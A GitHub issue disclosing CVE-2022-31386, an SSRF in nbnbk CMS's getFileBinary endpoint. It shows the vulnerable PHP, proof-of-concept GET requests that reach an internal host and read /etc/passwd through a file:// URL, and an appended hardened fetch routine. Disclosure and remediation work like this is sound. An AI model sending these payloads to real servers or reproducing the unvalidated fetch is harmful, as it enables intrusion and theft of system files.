CVE-2022-31386: [Vuln] SSRF vulnerability in getFileBinary Function · Issue #5 · Fanli2012/nbnbk

A Server-Side Request Forgery (SSRF) in the getFileBinary function of nbnbk cms 3 allows attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the URL parameter.


A Server-Side Request Forgery (SSRF) in the getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests by injecting arbitrary URLs into the url parameter.

Vulnerable code in /application/api/controller/Index.php

/**
 * Convert a file to a Base64 binary stream
 * @param $url Network file path, absolute address
 * @return string
 */
public function getFileBinary()
{
    // The request's url parameter is passed to file_get_contents() unvalidated
    $str = file_get_contents($_REQUEST['url']);
    Util::echo_json(ReturnData::create(ReturnData::SUCCESS, chunk_split(base64_encode($str))));
}

Vulnerability PoC

GET /api/Index/getFileBinary?url=http://172.16.119.1:8181/flag.txt HTTP/1.1
Host: 172.16.119.130
Connection: close

The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.

A remote attacker can also read arbitrary file information from the target system.

PoC

GET /api/Index/getFileBinary?url=file:///etc/passwd HTTP/1.1
Host: 172.16.119.130
Connection: close

Base64-decoding the data field of the HTTP response body yields the contents of the file (/etc/passwd).
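A hardened counterpart to the fetch in getFileBinary, as an added example that is not nbnbk's code or the project's fix: it allows only http/https, refuses private and reserved addresses, pins the vetted IP and disables redirects. The names vet_fetch_target and fetch_vetted are hypothetical, the cURL extension is assumed, and only IPv4 targets are accepted.

```php
<?php
// Added example, not nbnbk code; function names are hypothetical.

/** Return [host, port, ip] if $url is an acceptable fetch target, else null. */
function vet_fetch_target(string $url): ?array
{
    $p = parse_url($url);
    if (!is_array($p) || !isset($p['scheme'], $p['host']) || isset($p['user'])) {
        return null;
    }
    $scheme = strtolower($p['scheme']);
    // Only http/https: rejects file://, php://, ftp:// and other wrappers.
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }
    $host = $p['host'];
    // Literal IP or DNS lookup; IPv4 only, each address must pass the range filters.
    $ips = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : (gethostbynamel($host) ?: []);
    $flags = FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ($ips as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return null;
        }
    }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    return $ips === [] ? null : [$host, $port, $ips[0]];
}

/** Fetch $url only after vetting; assumes the cURL extension is loaded. */
function fetch_vetted(string $url): ?string
{
    if (($t = vet_fetch_target($url)) === null) {
        return null;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false, // a redirect could lead back inside
        CURLOPT_RESOLVE        => ["{$t[0]}:{$t[1]}:{$t[2]}"], // pin the vetted IP
        CURLOPT_TIMEOUT        => 5,
    ]);
    $body = curl_exec($ch);
    return is_string($body) ? $body : null;
}

// Constructed check (validator only, no request is sent): the report's two PoC URLs.
foreach (['http://172.16.119.1:8181/flag.txt', 'file:///etc/passwd'] as $u) {
    echo $u, ' => ', vet_fetch_target($u) === null ? 'rejected' : 'allowed', PHP_EOL;
}
```

PHP's private and reserved range flags do not cover every non-public block (100.64.0.0/10, for example), so add explicit CIDR checks for any ranges that matter in your network.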
